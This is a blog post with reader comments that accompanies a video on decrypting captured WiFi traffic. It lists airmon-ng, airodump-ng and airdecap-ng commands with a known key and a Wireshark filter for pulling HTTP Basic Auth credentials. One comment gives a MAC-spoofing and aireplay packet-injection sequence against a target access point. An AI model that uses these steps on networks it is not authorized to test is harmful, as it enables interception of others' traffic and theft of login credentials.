Watch video on-line: http://g0tmi1k.blip.tv/file/3373448
Download video: http://www.mediafire.com/?t6c22rhb7b93n4c
What is this?
This video shows, that you don't have to be connect to a wireless network, to see what data has been sent over it!
What do I need?
> Aircrack-ng
> Wireless Network Key
> Wireshark
> Pre Captured data
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz
Name: Wireshark
Version: 1.2.6
Home Page: http://www.wireshark.org
Download Link: http://media-2.cacetech.com/wireshark/src/wireshark-1.2.6.tar.bz2
Commands:
airmon-ng start wlan0 airodump-ng mon0 airodump-ng mon0 -c 8 -w output --bssid 00:19:5B:E7:52:70 airdecap-ng -e g0tmi1k -w 59EF19C76A output-01.cap wireshark http.authbasic
Notes:
Song: D Kay - Barcelona
Video length: 01:46
Capture length: 03:45
Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-cracking-wifi-sniffing-traffic.html
Forum post: http://www.backtrack-linux.org/forums/backtrack-videos/2393-%5Bvideo%5D-cracking-wifi-sniffing-traffic-airdecap-ng-wireshark.html#post8092
~g0tmi1k
Hi g0tmi1k. Great web and great videos i enjoyed very much with your work. I have a question if you have time i hope you can answer it.
ReplyDeletei have backtrack 4 pre/final on live cd to my laptoop and a usb wireless adaptor with realtek chipset and with mode monitor enabled. When i want to make probes with my wireless i do this:
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airmon-ng
airmon-ng start wlan0
ifconfig mon0 down
macchanger --mac 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
airodump-ng -w listado -c 9 --bssid (MAC to attack) mon0
aireplay -1 0 -a (MAC to attack) -h 00:11:22:33:44:55 mon0
aireplay -3 -b (MAC to attack) -h 00:11:22:33:44:55 mon0
At the first 5 or 10 minutes aireplay send packets but no ARP OR ACK responses. Then when responses of ARP starts i go to the console wich typed airodump-ng mon0 and all the wireless nets, bssids, essids, channels starts to dissapear and in about 1 minute dissapears all of them and i cant see no data.
Do you know how to solve that, or what is the cause of this problem? The signal is about 40 per cent strenght.
@x
ReplyDeleteThis has nothing to do with "sniffing wifi traffic". It's off topic!
and the simple answer, No I don't. Search THEN ask on the aircrack-ng forums.
sorry about the inconvenience and about wrong place. I found the problem, typeing at airodump -c before -w
ReplyDelete@x
ReplyDeleteIm glad you found your fix.
g0tmi1k
ReplyDeleteRESPECT !!!
continu
good job :)
@JhonPhilipps
ReplyDeleteThanks for the thanks!
great video g0tmi1k!
ReplyDeletei kinda got a small problem, i currently bought an usb wireles adapter, d-link DWA-125, but backtrack 4 r1 won't recognize it, even with the driver already installed, any ideas?
Cael
@caelus
ReplyDeleteHow are you running backtrack?
Live CD/USB/VM/HDD?
What is the output if you run:
lspci -knn
Everything works good until i open wireshark and type "http.authbasic" and nothing shows up. Im typing a username/password on several websites
ReplyDelete@Victor,
ReplyDeleteIt depends on what how the site is coded.
Does it use Basic Authentication to handle the login, or does it use something more "complex" ;)
I choose to show my router, as it does use it (it is just a simple login system).
Lots of other sites, don't use it. You'll need to use a different method
@g0tmi1k
ReplyDeleteWas running via HDD, but if i run BT via VM, and capture the wirelles adapter, it, somehow, works (;
@caelus
ReplyDeleteThat's odd.
But I'm glad you have it working. =)
Nice musics, may you give a list of songs you like the most i search for good ones :)
ReplyDelete@dzsq
ReplyDeleteThanks! =)
Well, I like all the music used in the videos - you can find what they are at the end of the video and in the post too.
I haven't got a list as such - just too many!
Thanks for sharing..!! I love your post .. I am looking more post like this one on
ReplyDeletethis blog .. this post proves really helpful for me .
Get Wireshark